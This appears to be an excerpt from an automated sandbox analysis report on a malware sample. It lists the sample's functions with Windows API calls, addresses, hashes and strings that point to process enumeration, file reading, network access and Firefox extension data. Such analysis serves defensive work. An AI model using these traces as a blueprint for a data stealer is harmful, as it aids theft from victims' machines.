                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d MB
                                                                                                                                                                                                                                                                                                  • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                                  Function 00402790 Relevance: 7.6, APIs: 5, Instructions: 104stringnetworkCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                                  Function 00410FE0 Relevance: 7.6, APIs: 5, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                                  Function 0040C530 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 184stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                  • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4550867a98b25e7581df9e4b8235ee868c3135c7b22e1cb8c030328980bfc982
                                                                                                                                                                                                                                                                                                  • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4550867a98b25e7581df9e4b8235ee868c3135c7b22e1cb8c030328980bfc982
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                                  Function 00416EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                                  Function 00413E50 Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
